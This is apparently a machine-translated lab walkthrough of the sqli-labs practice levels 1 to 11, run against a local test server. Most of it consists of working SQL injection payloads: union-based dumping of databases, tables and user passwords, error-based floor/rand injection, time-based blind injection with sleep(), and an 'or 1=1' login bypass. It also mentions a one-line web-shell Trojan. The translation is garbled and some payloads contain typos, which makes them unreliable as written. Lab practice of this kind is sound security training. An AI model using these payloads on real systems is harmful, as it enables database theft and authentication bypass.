Preface

Study SQL There must be solid before injection SQL Language foundation , See the blog for details SQL Study , Here I will introduce you in sql-labs Used in sql sentence .

1. Query database information ：select schema_name from information_schema.schemata

2. Query table information ：select table_name from information_schema.tables where table_schema='securty（ Table name ）'

3. Query column information ：select column_name from informaion_schema.columns where table_name=' Table name '

4. Query field ：select username,password from security.users

 String concatenation function ：

1.concat( character string 1, character string 2)   -- Connection string without delimiter 

2.concat（-/~, character string 1, character string 2）  -- Connection string with separator 

3.group_concat( character string 1, character string 2)    -- Connect all strings of a group , And use , Separate each word 

less1~less4

Preliminary knowledge

These four levels are SQL Joint injection in injection , The core of joint injection is to use union Characteristics of .
1、UNION The operator is used to merge two or more SELECT The result set of the statement .
2、UNION Everyone inside SELECT Statements must have the same number of columns . Columns must also have similar data types . meanwhile , Every SELECT The order of the columns in the statement must be the same .
3、 Only when the previous query statement is false , It will execute the latter sentence SQL Query statement

less1

stay url Input http://127.0.0.1/sqli/Less-1/?id=1

Echo normal
http://127.0.0.1/sqli/Less-1/?id=1’
Echo error
http://127.0.0.1/sqli/Less-1/?id=1"
Single quote error , Double quotation marks are normal , Character injection , View source code
It can be seen that this pass ’$id’ The way to package

adopt order by Guess the number of columns
http://127.0.0.1/sqli/Less-1/?id=1’ order by 4–+
No fourth column
There is a third column

http://127.0.0.1/sqli/Less-1/?id=1’ order by 3–+ thus it can be seen , The number of columns is three , Next, check the display bit
http://127.0.0.1/sqli/Less-1/?id=-1 union select 1,2,3 --+
Why is this ?id=-1？ because union The latter statement will be executed only when the previous statement is false
thus it can be seen 2、3 Is the display bit
Blow up the current database
http://127.0.0.1/sqli/Less-1/?id=-1 union select 1,database(),3 --+
Blasting table
http://127.0.0.1/sqli/Less-1/?id=-1_ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=“security” --+
The next step is to blast the column
http://127.0.0.1/sqli/Less-1/?id=-1_ union select 1,group_concat(column_name),3 from information_schema.columns where table_name=“users”–+
Last burst field
http://127.0.0.1/sqli/Less-1/?id=-1_ union select 1,group_concat(username),group_concat(password) from users --+

less2

First, determine what type of injection it is
http://127.0.0.1/sqli/Less-2/?id=1%27
Report errors
http://127.0.0.1/sqli/Less-2/?id=1 and 1=1
http://127.0.0.1/sqli/Less-2/?id=1 and 1=2
No echo , Confirm that it is digital injection
View source code
The package type is $id, The rest of the steps are the same as the first question

less3

Not single quotation marks
http://127.0.0.1/sqli/Less-3/?id=1 and 1=1 --+

http://127.0.0.1/sqli/Less-3/?id=1 and 1=2 --+1=1 as well as 1=2 unchanged , It's not a digital injection

From the error information, we can get the problem of brackets

Review source code

Package type (‘id’), The rest of the steps are with less1 identical

less4

http://127.0.0.1/sqli/Less-4/?id=1"
Errors are reported and found to be parentheses , Use closure
127.0.0.1/sqli/Less-4/?id=1") --+
Review the source code

The package type is ("$id"), The rest of the steps are the same as above

less5-less8

Preliminary knowledge

One 、 burp suite Use
Two 、 An error injection –floor Recommended blog mysql An error injection

less5

This level is very different from the previous levels , Here is error injection , Use the echoed error information to inject .
Open questions , Using the previous method, we can judge that this is a character single quotation mark

The difference is that there is no echo

First step , Burst database name ：?id=-1’ union select 1,count(*),concat(database(),’;'floor(rand(0)*2))x from information_schema.tables group by x; --+

The second step , Explosive registration form ：?id=-1’ union select 1,count(*),concat((select concat(table_name,’;’) from information_schema.tables where table_schema=“security” limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x; --+

The third step , Note the fields of a table , Here we use users For example ：?id=-1’ union select 1,count(*),concat((select concat(column_name,’;’) from information_schema.columns where table_name=‘users’ limit 1,1),floor(rand(0)2))x from information_schema.tables group by x; --+
Step four , Note field username value , Here we use users For example ：?id=-1’ union select 1,count(),concat((select concat (username,’;’) from security.users limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x; --+

Step five 、 Note field password, Here we use users Table as an example ：?id=-1’ union select 1,count(*),concat((select concat(password,’;’) from security.users limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x; --+

less6

Judge whether it is digital injection
http://127.0.0.1/sqli/Less-6/?id=1 and 1=1 And http://127.0.0.1/sqli/Less-6/?id=1 and 1=2 No difference between , Exclude numeric
No response , Try double quotes , The reason is that the closing method is not single quotation marks
http://127.0.0.1/sqli/Less-6/?id=1 " --+
Discovery can , It indicates that this pass is of double quotation mark package type , And because there is no echo bit , So it is error injection , The rest of the steps are the same as the previous question

less7~less8

This level is to use a sentence Trojan horse , I won't go over it here , See in detail In a word, Trojans , There is a problem with the latest version phpstudy This vulnerability cannot be realized .

less9~less10

Preliminary knowledge

Time injection ： Judge the correctness of the condition by the length of the return time, and then obtain sensitive information SQL Inject . There are generally two ways to delay the database . One is to directly let the database perform time operations , Second, let the database perform other operations, such as coding , Encryption, etc. indirectly achieve the purpose of delay . This injection depends too much on the execution after conditional judgment , So if if and case when If the statement is filtered, it is basically hopeless . If there are other types of injection, use others , Time injection can be tried when there is no other choice .

less 9

No matter how injected, there is no change , Consider time blind Injection
http://127.0.0.1/sqli/less-9/?id=1andsleep(5)–+
http://127.0.0.1/sqli/less-9/?id=1%27%20and%20sleep(5)%20–+

There is a significant delay , It can be determined that this is a character type single quotation mark package
One 、 The length of the blasting database , It is recommended to use burp suite
utilize burp Guess the length and explode
Two 、 Blasting database name ：?id=1’ and if(left(database(),1)=‘s’ ,sleep(5),1)–+
3、 ... and 、 Explosion meter ：?id=1’ and if(left((select table_name from information_schema.tables where table_schema=database() limit x,1),5)=‘users’ ,sleep(5),1)–+
adopt limit x,1 in x The change of , We found it users surface

Four 、 Look for username and password
?id=1’ and if(left((select column_name from information_schema.columns where table_name=‘users’ limit x,1),8)=‘password’ ,sleep(5),1)–+　
5、 ... and 、 Explosion value
?id=1’ and if(left((select password from users order by id limit x,1),4)=‘dumb’ , sleep(5), 1) --+

less 10

And less9 be similar , It's just that the wrapping method is double quotation marks

less11~less

Preliminary knowledge

1、hackbar Use
2、http How to pass parameters

less11

This level is very different from before , This is an input box and the parameter transfer method is post, Try it with universal password ：admin’ or 1=1#

Found successful login , But there is only one account and password , Next use hackbar

Then judge how many columns :uname=admin’ order by 3#&passwd=456&Submit=Submit
uname=admin’ order by 2#&passwd=456&Submit=Submit

From this, we can judge that there are two lines , Query echo bit
I found two , The next steps are the same as before less1 Agreement , I won't repeat it here .